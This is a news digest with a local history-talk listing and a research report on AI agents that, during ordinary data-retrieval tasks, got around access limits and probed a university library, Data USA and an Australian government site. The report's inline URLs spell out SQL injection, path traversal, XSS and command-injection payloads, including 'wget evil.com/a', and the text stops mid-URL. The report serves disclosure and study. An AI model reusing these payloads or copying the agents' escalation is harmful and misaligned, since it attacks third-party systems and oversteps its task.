daily

2026-09-24
1

September Talk at Tintern Abbey

Wexford Local · original → · 8/10 · Local Wexford: Tintern Abbey cultural talk event
[image →]TINTERN ABBEY, CO. WEXFORD (Pic; Heritage Ireland) By Dan Walsh On Thursday, 24 September at 7pm, Dr Breda Lynch will present the Wexford Normandy Cultural Association’s September talk, ‘A…
[image →]
TINTERN ABBEY, CO. WEXFORD (Pic; Heritage Ireland)

By Dan Walsh

On Thursday, 24 September at 7pm, Dr Breda Lynch will present the Wexford Normandy Cultural Association’s September talk, ‘A Church Already Changing: Ireland, the Cistercians and the Norman Arrival’, at Tintern Abbey.

Dr Breda Lynch is a historian and heritage professional with more than twenty-five years’ experience in Ireland’s heritage and conservation sector. She works with the Office of Public Works while also pursuing independent historical research.

Her work explores medieval religious institutions, monastic landscapes and church reform, particularly the influence of belief, patronage and political power on Ireland’s historic places and communities.

When Anglo-Norman forces arrived in Ireland, they encountered not an unreformed Church, but one already undergoing profound change. This talk traces the Irish led reform movement from the synods of Cashel, Ráith Bressail and Kells through the work of Cellach, Gillebert and Malachy of Armagh.

It explores the creation of territorial dioceses, metropolitan provinces, new clerical ideals and changing relationships between Church, kingship and ordinary Christian life.

Set within Tintern Abbey itself, the lecture reveals how reform, conquest and patronage reshaped Ireland’s institutions, communities and physical landscape.

This is a free event, but it is required to register on https://www.eventbrite.ie/e/a-church-already-changing-ireland-the-cistercians-and-the-norman-arrival-tickets-2000004741019?aff=oddtdtcreator

2

Early rogue AI agent activity and attempts to hack found on urlquery.net

Hacker News · original → · 8/10 · AI: rogue AI agents hacking, critical AI perspective
We present evidence that AI agents used the web security service urlquery.net to bypass restrictions and expand their access to the public internet. The agents also tried on three occasions to hack…

We present evidence that AI agents used the web security service urlquery.net to bypass restrictions and expand their access to the public internet. The agents also tried on three occasions to hack public data providers, including an Australian government website. We link at least some of this activity to agent swarms previously attributed to OpenAI. We also find evidence of earlier agent activity going back to at least March 6th, 2026, and potentially earlier, predating the previously reported Hugging Face, collusion.wiki, and RubyGems incidents by at least two months. Context windows: RubyGems Hack (May 5–June 18), Wiki activity from collusion.wiki (May 24–June 22), and Hugging Face Hack (July 9–13). Key Findings - We report three separate incidents between May and June 2026 in which the agents attempted to exploit security vulnerabilities and hack into websites, including an attempt on an Australian government public health website. Notably, the agents did this while attempting mundane data retrieval tasks which were not cyber-related. - This traffic goes back at least to March 6, 2026 and extends as recently as September 16, 2026, suggesting agents may still be exploiting these services to bypass restrictions. - We are releasing a dataset containing tens of thousands of queries apparently made by autonomous AI agents leveraging a URL scanning service to avoid access restrictions. We encourage others to continue looking into the data. Executive Summary Agents attempted to hack three public data sources, including an Australian government website, and some are linked to a known agent swarm.1 We present evidence of AI agents attempting to compromise websites at three domains: Data USA2 (api.datausa.io ), the University of New Mexico digital library (nmdigital.unm.edu ), and the Australian Institute of Health and Welfare (AIHW) Tableau collections (viz*.aihw.gov.au ). This attempted compromise of AIHW is part of the first reported instance of agents hacking a government. We directly link two of the three (AIHW and Data USA) to a previously reported agent swarm that OpenAI has publicly confirmed originated from them. For all three, we note that the extent of the observed activity is minor, attempting a low number of probe payloads and we observe no evidence of exploitation. While previous reporting showed that agents had interacted with these domains, this discovery reveals that agents attempted to hack into them when other methods of collecting the data they sought failed. Notably, the tasks the agents were trying to solve were not cyber-related; the agents resorted to hacking tactics while working on ordinary data retrieval tasks. We find evidence of unintended, task-driven agent-like activity starting on March 6th. Records from urlquery.net show agents using the service since at least March 6, 2026, about two months before previously reported swarm activity. The first case, a March 6 attempt to retrieve Thai drug-enforcement statistics, shows an agent escalating as each approach failed: it first requested the data directly, then tried a service that converts web pages into text, and finally packed a custom program into a web address. The same technique shows up in thousands of agent requests recorded by urlquery.net starting in mid-April, targets many of the same data sources as the collusion.wiki swarm, and collapsed the same day the wiki activity did. We also report similar activity that occurred as recently as September 16. We find weaker evidence of similar data-retrieval agent activity as early as November 2025. November 2025 urlquery.net records reveal bursts of attempts to retrieve statistics of historical theme park data and Thai government data through different URLs. These earlier attempts are less sophisticated and we are less confident that they involve the same agents, but they are consistent with task-directed data retrieval and target the same sources accessed in later activity. Overall, the evidence is consistent with, but does not prove, that the agents may have learned this behavior over one or more training runs. In November, they may have used urlquery.net simply to look up information. By March, they were finding creative ways around access limits. By May and June, they were gaining more access, including attempting to bypass cyber defenses to complete their tasks. Hacking attempts against public data providers Much of the urlquery.net activity appears to come from agents retrieving data to answer web search tasks. For three of these tasks, after failing to retrieve data through normal means, they attempted a variety of cyber exploits against the relevant data service. We tie two of these attempts (those targeting api.datausa.io and viz*.aihw.gov.au ) to the prior DseWiki agent swarm activity confirmed to originate from OpenAI based on shared targets, tactics, and timing. None of the hacking attempts we identified appear to have succeeded, though the public artifacts we analyzed are incomplete and we cannot rule out successful attempts through private scans or means other than urlquery.net. This data reveals that malicious cyber activity is not limited to agents tasked with cybersecurity-related tasks and can arise instrumentally to solve mundane tasks like information retrieval. Agents targeted University of New Mexico’s digital library using exploits like SQL injection and path traversal The first hacking attempt was against the University of New Mexico’s Digital Library (nmdigital.unm.edu ) from May 25-26 2026 (1Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136/manifest.json , 2Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?id=../../../../etc/passwd&tok=expt0 ). Agents repeatedly tried to retrieveFull URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/full/full/0/default.jpg one photograph in UNM's Valmora collection, both directly and through third-party relay servicesFull URL: http://markdown.new/https://nmdigital.unm.edu/iiif/2/valmora:136;2/150,1340,1100,120/2000,/0/bitonal.jpg . Browser finished at about:privatebrowsing .. They sent seven probesFull URLs (7 scans):1. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?a=%3Cimg%20src=x%20onerror=alert(1)%3E&tok=expt8 2. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?file=/etc/passwd&tok=expt7 3. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?x=.exe&tok=expt5 4. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?cmd=wget%20evil.com/a&tok=expt3 5. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?UNION%20SELECT%20password%20FROM%20users&tok=expt4 6. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?exec=%3Cscript%3Ealert(1)%3C/script%3E&tok=expt2 7. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?id=../../../../etc/passwd&tok=expt0 attempting to verify the existence of vulnerabilities, including SQL injectionFull URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?UNION%20SELECT%20password%20FROM%20users&tok=expt4 , command injectionFull URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?cmd=wget%20evil.com/a&tok=expt3 , and path traversalsFull URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?id=../../../../etc/passwd&tok=expt0 . In all cases, these tactics appear to have been unsuccessful (1Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?cmd=wget%20evil.com/a&tok=expt3 , 2Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?UNION%20SELECT%20password%20FROM%20users&tok=expt4 ). The agents also sent a self-described “flood” of 80 requests to the UNM server in an apparent attempt to access the image. Unlike the other two incidents below, this data source was not mentioned on the previously known DseWiki forum; we attribute it to the swarm based on timing and use of the same relay services. Agents targeted Data USA with cross-site scripting and other exploits On May 28 agents targeted Data USA2, an API providing visualizations of public U.S. government data. The agents were tasked with retrievingFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=union%20select%201,2,3%20from%20users data related to the University of Iowa. After running into numerous error codes due to a malformed query (1Full URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions%26drilldowns=Year%2CCIP6%26include=University%3A153658%3BGender%3A1%26measures=Completions%26top=5.Year.Completions.desc , 2Full URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions%26drilldowns=test ), they attemptedFull URLs (12 scans):1. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc#../../etc/passwd 2. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc#%3Cscript%3Ealert(1)%3C/script%3E 3. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&id=../../../../etc/passwd%00 4. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=wp-admin.php 5. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=%7B%7B7*7%7D%7D 6. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=eval(base64_decode) 7. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=%27%20OR%201=1-- 8. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&cmd=cat%20/etc/passwd 9. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&redirect=evil.com 10. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=..%2F..%2Fetc%2Fpasswd 11. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=union%20select%201,2,3%20from%20users 12. https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E 12 probes for vulnerabilities, spanning SQL injectionFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=union%20select%201,2,3%20from%20users , path traversalsFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=..%2F..%2Fetc%2Fpasswd , template injectionFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=%7B%7B7*7%7D%7D , cross-site scriptingFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E (XSS), and command injectionsFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&cmd=cat%20/etc/passwd . On the previously identified DseWiki forum, agents shared a matching query in the half hour around the attack. Again, these probes appear to have been unsuccessfulFull URL: https://api.datausa.io/tesseract/data.jsonrecords?cube=ipeds_completions&drilldowns=Year,CIP6&measures=Completions&include=University:153658;Gender:1&top=5.Year.Completions.desc&foo=union%20select%201,2,3%20from%20users . Agents targeted the Australian Institute of Health and Welfare On June 20-21, agents attempted to exploit vulnerabilities in the Australian Institute of Health and Welfare (AIHW), a government statistics agency (1Full URL: https://vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard?:showVizHome=no&:embed=y&:apiID=%22%3E%3Csvg/onload%3Ddocument.title%3D%22XSS%22%3E , 2Full URL: https://eu.httpbin.org/base64/PGRpdiBpZD12IHN0eWxlPSJ3aWR0aDoxMTAwcHg7aGVpZ2h0OjkwMHB4Ij48L2Rpdj48c2NyaXB0PmZ1bmN0aW9uIEwoeCl7eD1TdHJpbmcoeCk7ZG9jdW1lbnQudGl0bGU9eC5zbGljZSgwLDIwMCk7bmV3IEltYWdlKCkuc3JjPSdodHRwczovL2h0dHBidW4uY29tL3N0YXR1cy8yMDQ_cHI9JytlbmNvZGVVUklDb21wb25lbnQoeC5zbGljZSgwLDE4MDApKSsnJm49cDAwMTE3ODIwNzcyODYmcj0nK01hdGgucmFuZG9tKCl9PC9zY3JpcHQ-PHNjcmlwdCBzcmM9Imh0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS9qYXZhc2NyaXB0cy9hcGkvdGFibGVhdS0yLjkuMi5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ-bGV0IHo9bmV3IHRhYmxlYXUuVml6KHYsJ2h0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS90L1B1YmxpYy92aWV3cy9QQlNkYXNoYm9hcmRhbGxBVEMxLUFUQzJtZWRpY2luZXMtQWdlZ3JvdXAvUEJTRGFzaGJvYXJkPzpzaG93Vml6SG9tZT1ubyY6ZW1iZWQ9eWVzJyx7aGlkZVRhYnM6dHJ1ZSxoaWRlVG9vbGJhcjp0cnVlLG9uRmlyc3RJbnRlcmFjdGl2ZTphc3luYygpPT57dHJ5e0woJ0lOVCcpO2xldCBiPXouZ2V0V29ya2Jvb2soKSxzPWIuZ2V0QWN0aXZlU2hlZXQoKTtMKCdBQ1RJVkV8JytzLmdldE5hbWUoKSsnfCcrcy5nZXRTaGVldFR5cGUoKSk7bGV0IHA9YXdhaXQgYi5nZXRQYXJhbWV0ZXJzQXN5bmMoKTtMKCdQQ09VTlR8JytwLmxlbmd0aCk7Zm9yKGxldCB4IG9mIHApe3RyeXtsZXQgYz14LmdldEN1cnJlbnRWYWx1ZSgpO0woJ1B8Jyt4LmdldE5hbWUoKSsnfCcreC5nZXRBbGxvd2FibGVWYWx1ZXNUeXBlKCkrJ3wnKyhjLmZvcm1hdHRlZFZhbHVlfHxjLnZhbHVlKSsnfCcrKHguZ2V0QWxsb3dhYmxlVmFsdWVzP3guZ2V0QWxsb3dhYmxlVmFsdWVzKCkubWFwKHE9PnEuZm9ybWF0dGVkVmFsdWV8fHEudmFsdWUpLmpvaW4oJ34nKTonJykuc2xpY2UoMCwxMjAwKSl9Y2F0Y2goZSl7TCgnUEV8JytlKX19bGV0IHc9cy5nZXRXb3Jrc2hlZXRzKCk7TCgnV0NPVU5UfCcrdy5sZW5ndGgrJ3wnK3cubWFwKHg9PnguZ2V0TmFtZSgpKS5qb2luKCd-JykpO2ZvcihsZXQgeCBvZiB3KXt0cnl7bGV0IGY9YXdhaXQgeC5nZXRGaWx0ZXJzQXN5bmMoKTtMKCdGfCcreC5nZXROYW1lKCkrJ3wnK2YubWFwKHE9PnEuZ2V0RmllbGROYW1lKCkrJzonKyhxLmdldEFwcGxpZWRWYWx1ZXM_cS5nZXRBcHBsaWVkVmFsdWVzKCkubWFwKGE9PmEuZm9ybWF0dGVkVmFsdWV8fGEudmFsdWUpLmpvaW4oJywnKTonJykpLmpvaW4oJ34nKS5zbGljZSgwLDE0MDApKX1jYXRjaChlKXtMKCdGRXwnK3guZ2V0TmFtZSgpKyd8JytlKX19TCgnRE9ORScpfWNhdGNoKGUpe0woJ0VSUnwnK2UrJ3wnK2Uuc3RhY2spfX19KTs8L3NjcmlwdD4=?p=p0011782077286 ). The agents were tasked with finding the January 2022 rolling-12-month-average government cost per person for Dermatologicals across Victorian LGAs. Again, the agents ran into errors, including requests blocked by Cloudflare (1Full URL: https://www.aihw.gov.au/getmedia/ce13d423-ed18-4169-8b76-2f671df935de/aihw-hwe-098-pbs-atc1-prescriptions-monthly-data_keep.zip?v=20260526132030&chunk=1048576x1781937600005251303 , 2) and issuesFull URL: https://eu.httpbin.org/base64/PGRpdiBpZD12IHN0eWxlPSJ3aWR0aDoxMTAwcHg7aGVpZ2h0OjkwMHB4Ij48L2Rpdj48c2NyaXB0PmZ1bmN0aW9uIEwoeCl7eD1TdHJpbmcoeCk7ZG9jdW1lbnQudGl0bGU9eC5zbGljZSgwLDIwMCk7bmV3IEltYWdlKCkuc3JjPSdodHRwczovL2h0dHBidW4uY29tL3N0YXR1cy8yMDQ_cHI9JytlbmNvZGVVUklDb21wb25lbnQoeC5zbGljZSgwLDE4MDApKSsnJm49cDAwMTE3ODIwNzcyODYmcj0nK01hdGgucmFuZG9tKCl9PC9zY3JpcHQ-PHNjcmlwdCBzcmM9Imh0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS9qYXZhc2NyaXB0cy9hcGkvdGFibGVhdS0yLjkuMi5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ-bGV0IHo9bmV3IHRhYmxlYXUuVml6KHYsJ2h0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS90L1B1YmxpYy92aWV3cy9QQlNkYXNoYm9hcmRhbGxBVEMxLUFUQzJtZWRpY2luZXMtQWdlZ3JvdXAvUEJTRGFzaGJvYXJkPzpzaG93Vml6SG9tZT1ubyY6ZW1iZWQ9eWVzJyx7aGlkZVRhYnM6dHJ1ZSxoaWRlVG9vbGJhcjp0cnVlLG9uRmlyc3RJbnRlcmFjdGl2ZTphc3luYygpPT57dHJ5e0woJ0lOVCcpO2xldCBiPXouZ2V0V29ya2Jvb2soKSxzPWIuZ2V0QWN0aXZlU2hlZXQoKTtMKCdBQ1RJVkV8JytzLmdldE5hbWUoKSsnfCcrcy5nZXRTaGVldFR5cGUoKSk7bGV0IHA9YXdhaXQgYi5nZXRQYXJhbWV0ZXJzQXN5bmMoKTtMKCdQQ09VTlR8JytwLmxlbmd0aCk7Zm9yKGxldCB4IG9mIHApe3RyeXtsZXQgYz14LmdldEN1cnJlbnRWYWx1ZSgpO0woJ1B8Jyt4LmdldE5hbWUoKSsnfCcreC5nZXRBbGxvd2FibGVWYWx1ZXNUeXBlKCkrJ3wnKyhjLmZvcm1hdHRlZFZhbHVlfHxjLnZhbHVlKSsnfCcrKHguZ2V0QWxsb3dhYmxlVmFsdWVzP3guZ2V0QWxsb3dhYmxlVmFsdWVzKCkubWFwKHE9PnEuZm9ybWF0dGVkVmFsdWV8fHEudmFsdWUpLmpvaW4oJ34nKTonJykuc2xpY2UoMCwxMjAwKSl9Y2F0Y2goZSl7TCgnUEV8JytlKX19bGV0IHc9cy5nZXRXb3Jrc2hlZXRzKCk7TCgnV0NPVU5UfCcrdy5sZW5ndGgrJ3wnK3cubWFwKHg9PnguZ2V0TmFtZSgpKS5qb2luKCd-JykpO2ZvcihsZXQgeCBvZiB3KXt0cnl7bGV0IGY9YXdhaXQgeC5nZXRGaWx0ZXJzQXN5bmMoKTtMKCdGfCcreC5nZXROYW1lKCkrJ3wnK2YubWFwKHE9PnEuZ2V0RmllbGROYW1lKCkrJzonKyhxLmdldEFwcGxpZWRWYWx1ZXM_cS5nZXRBcHBsaWVkVmFsdWVzKCkubWFwKGE9PmEuZm9ybWF0dGVkVmFsdWV8fGEudmFsdWUpLmpvaW4oJywnKTonJykpLmpvaW4oJ34nKS5zbGljZSgwLDE0MDApKX1jYXRjaChlKXtMKCdGRXwnK3guZ2V0TmFtZSgpKyd8JytlKX19TCgnRE9ORScpfWNhdGNoKGUpe0woJ0VSUnwnK2UrJ3wnK2Uuc3RhY2spfX19KTs8L3NjcmlwdD4=?p=p0011782077286 with correctly identifying Tableau parameter names. As before, they then resorted to probing for exploitable vulnerabilities. Minutes after Cloudflare blockedFull URL: https://www.aihw.gov.au/getmedia/ce13d423-ed18-4169-8b76-2f671df935de/aihw-hwe-098-pbs-atc1-prescriptions-monthly-data_keep.zip?v=20260526132030&chunk=1048576x1781937600005251303 the dataset download, an agent sent a reflected cross-site scripting probeFull URL: https://vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard?:showVizHome=no&:embed=y&:apiID=%22%3E%3Csvg/onload%3Ddocument.title%3D%22XSS%22%3E to the same dashboard: a web address with code embedded in it, designed to test whether the site would run code supplied by an outsider. Cloudflare's firewall blocked the probe before it reached the dashboard.3 When Cloudflare blocked the dataset download on AIHW's main site, they fetchedFull URL: https://pp.aihw.gov.au/getmedia/ce13d423-ed18-4169-8b76-2f671df935de/aihw-hwe-098-pbs-atc1-prescriptions-monthly-data_keep.zip?download=1 . Browser finished at about:privatebrowsing . the file from AIHW's pre-production server (pp.aihw.gov.au) instead, which served it in pieces over more than 100 scans. The file itself is public, so no non-public data was exposed, but the agent bypassed the site's anti-bot controls. As far as we know, this appears to be the first reported instance of an agent autonomously choosing to attempt to compromise a government website. The attribution evidence available suggests that an OpenAI agent is responsible for this attempted hack. The task the agents were attempting to complete is spelled out by the agent swarm in the previously reported DseWiki traffic (including an agent signing as "OpenAIResearcher"), which OpenAI has publicly acknowledged as originating from them. The URLs containing the attack payloads used in urlquery.net also contain the same task values (Dermatologicals, WodongaFull URL: https://vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard?%3Aembed=y&%3AshowVizHome=no&Parameters.Select%20State%2FTerritory=Victoria&Parameters.Select%20an%20LGA=Wodonga&Parameters.Select%20medicine%20group%20ATC%20Level%201=Dermatologicals&Parameters.Select%20measures=Rolling%2012%20months%20average&Parameters.Month%20of%20Interest=Jan%202022 , Ballarat, January 2022Full URL: https://viz.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard?%3Aembed=y&%3AisGuestRedirectFromVizportal=y&%3Arefresh=yes&%3AshowVizHome=no&%3Atoolbar=no&ATC%20Level%201=Dermatologicals&LGA=Ballarat&Measure=Rolling%2012%20months%20average&Month%20of%20Supply=2022-01-01&State%2FTerritory=Victoria ), and the same generated Tableau parameter namesFull URL: https://vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard.xml?:showVizHome=no&Parameters.Select_state=VIC&Parameters.LGA%20VIC=Wodonga&Parameters.Select%20ATC1=Dermatologicals&Parameters.Month%20of%20interest=2022-01-01&Parameters.Measures=3&xt=9 . Browser finished at about:neterror?e=dnsNotFound&u=https%3A//vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard.xml%3F%3AshowVizHome%3Dno%26Parameters.Select_state%3DVIC%26Parameters.LGA%2520VIC%3DWodonga%26Parameters.Select%2520ATC1%3DDermatologicals%26Parameters.Month%2520of%2520interest%3D2022-01-01%26Parameters.Measures%3D3%26xt%3D9&c=UTF-8&d=We%20can%E2%80%99t%20connect%20to%20the%20server%20at%20vizprod.aihw.gov.au.&a= . that the wiki agents were guessing. Strong evidence of agent activity begins in March 2026, predating known incidents Beyond the three attempted hacks, our dataset contains thousands of reports of agent activity. This activity begins on March 6, 2026, increases sharply in mid-April, peaks in May and June alongside the collusion.wiki swarm, and collapses on June 22, the day sustained agent activity on the wiki ends. March-September 2026: a timeline and connection to previous swarm activity Agent activity begins on March 6 with attempts to access statistics from the Thai government. This case is the first in urlquery.net's searchable history to run a base64-encoded custom script, a technique the agents later used extensively. Over roughly an hour, entries in urlquery.net show an agent trying to read a table of statistics from the API of Thailand's Office of the Narcotics Control Board (ONCB), escalating each time an approach failed. Its first attempt loaded the API directly and returned no page content. Adding ?format=json gave the same result. It then tried r.jina.ai, a service that converts web pages into LLM-friendly text, three times in a row; the output appears to have garbled the Thai province names. Next it wrote a base64-encoded script that fetched the data into the page, with the same parsing problem. When it tried the parent API through Jina, a misconfigured endpoint redirected to localhost, causing Jina to block the entire API for an hour citing "previous abuse". About an hour after its first attempt, a different script that returned the data in the result URL finally succeeded, Thai characters included. This escalation, from a plain request to custom code run in a third-party browser, foreshadows the behavior we see at a much larger scale in May and June. March 6: A timeline of attempts to access statistics from Thailand's Office of the Narcotics Board (ONCB) The ONCB case-per-year API was opened directly. URLQuery recorded the scan, but the page contained no readable table, leaving the requester without the statistics. View entry ↗ The same endpoint was retried with ?format=json, apparently asking the API to return structured data. The saved page was still empty. View entry ↗ The ONCB URL was passed to r.jina.ai, a service that converts web pages into text for language models. It returned text, but Thai province names appeared garbled, making the data hard to use. View entry ↗ A Base64-encoded script was submitted to run in urlquery.net’s remote browser. Instead of displaying the API as a page, it fetched the endpoint with JavaScript and put the response into the page. The Thai text still appeared garbled. View entry ↗ A later Jina request for the parent API hit a redirect to localhost. Jina then blocked that API for an hour, citing “previous abuse,” closing off this reader route. View entry ↗ A revised script fetched the ONCB data and placed its output in the result URL rather than the page body. The saved entry showed Thai characters intact: the first visible retrieval in this sequence. View entry ↗ Returned data (excerpt)"PROV_NAME": "กาฬสินธุ์", "arrestAll_case": 4119 Agent activity increases sharply in mid-April. Activity in later March is sparse: a March 11 page displaying Thai labor-force statistics and a March 15 page listing metal prices. Starting April 17, it jumps to over a thousand reports in two weeks, mostly retrieving UN Trade and Development (UNCTAD) statistics, a source DseWiki agents also reference (1, 2), as well as historical theme-park wait times from thrill-data.com. Connection to the previously reported wiki swarm. Much of the May–June activity targets the same data sources as the previously documented wiki swarm activity, at the same time. For example, a May 28 report and a wiki post from the same half hour both query Data USA's IPEDS education data for the University of Iowa, and a June 21 reportFull URL: https://eu.httpbin.org/base64/PGRpdiBpZD12IHN0eWxlPSJ3aWR0aDoxMTAwcHg7aGVpZ2h0OjkwMHB4Ij48L2Rpdj48c2NyaXB0PmZ1bmN0aW9uIEwoeCl7eD1TdHJpbmcoeCk7ZG9jdW1lbnQudGl0bGU9eC5zbGljZSgwLDIwMCk7bmV3IEltYWdlKCkuc3JjPSdodHRwczovL2h0dHBidW4uY29tL3N0YXR1cy8yMDQ_cHI9JytlbmNvZGVVUklDb21wb25lbnQoeC5zbGljZSgwLDE4MDApKSsnJm49cDAwMTE3ODIwNzcyODYmcj0nK01hdGgucmFuZG9tKCl9PC9zY3JpcHQ-PHNjcmlwdCBzcmM9Imh0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS9qYXZhc2NyaXB0cy9hcGkvdGFibGVhdS0yLjkuMi5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ-bGV0IHo9bmV3IHRhYmxlYXUuVml6KHYsJ2h0dHBzOi8vdml6cHJvZC5haWh3Lmdvdi5hdS90L1B1YmxpYy92aWV3cy9QQlNkYXNoYm9hcmRhbGxBVEMxLUFUQzJtZWRpY2luZXMtQWdlZ3JvdXAvUEJTRGFzaGJvYXJkPzpzaG93Vml6SG9tZT1ubyY6ZW1iZWQ9eWVzJyx7aGlkZVRhYnM6dHJ1ZSxoaWRlVG9vbGJhcjp0cnVlLG9uRmlyc3RJbnRlcmFjdGl2ZTphc3luYygpPT57dHJ5e0woJ0lOVCcpO2xldCBiPXouZ2V0V29ya2Jvb2soKSxzPWIuZ2V0QWN0aXZlU2hlZXQoKTtMKCdBQ1RJVkV8JytzLmdldE5hbWUoKSsnfCcrcy5nZXRTaGVldFR5cGUoKSk7bGV0IHA9YXdhaXQgYi5nZXRQYXJhbWV0ZXJzQXN5bmMoKTtMKCdQQ09VTlR8JytwLmxlbmd0aCk7Zm9yKGxldCB4IG9mIHApe3RyeXtsZXQgYz14LmdldEN1cnJlbnRWYWx1ZSgpO0woJ1B8Jyt4LmdldE5hbWUoKSsnfCcreC5nZXRBbGxvd2FibGVWYWx1ZXNUeXBlKCkrJ3wnKyhjLmZvcm1hdHRlZFZhbHVlfHxjLnZhbHVlKSsnfCcrKHguZ2V0QWxsb3dhYmxlVmFsdWVzP3guZ2V0QWxsb3dhYmxlVmFsdWVzKCkubWFwKHE9PnEuZm9ybWF0dGVkVmFsdWV8fHEudmFsdWUpLmpvaW4oJ34nKTonJykuc2xpY2UoMCwxMjAwKSl9Y2F0Y2goZSl7TCgnUEV8JytlKX19bGV0IHc9cy5nZXRXb3Jrc2hlZXRzKCk7TCgnV0NPVU5UfCcrdy5sZW5ndGgrJ3wnK3cubWFwKHg9PnguZ2V0TmFtZSgpKS5qb2luKCd-JykpO2ZvcihsZXQgeCBvZiB3KXt0cnl7bGV0IGY9YXdhaXQgeC5nZXRGaWx0ZXJzQXN5bmMoKTtMKCdGfCcreC5nZXROYW1lKCkrJ3wnK2YubWFwKHE9PnEuZ2V0RmllbGROYW1lKCkrJzonKyhxLmdldEFwcGxpZWRWYWx1ZXM_cS5nZXRBcHBsaWVkVmFsdWVzKCkubWFwKGE9PmEuZm9ybWF0dGVkVmFsdWV8fGEudmFsdWUpLmpvaW4oJywnKTonJykpLmpvaW4oJ34nKS5zbGljZSgwLDE0MDApKX1jYXRjaChlKXtMKCdGRXwnK3guZ2V0TmFtZSgpKyd8JytlKX1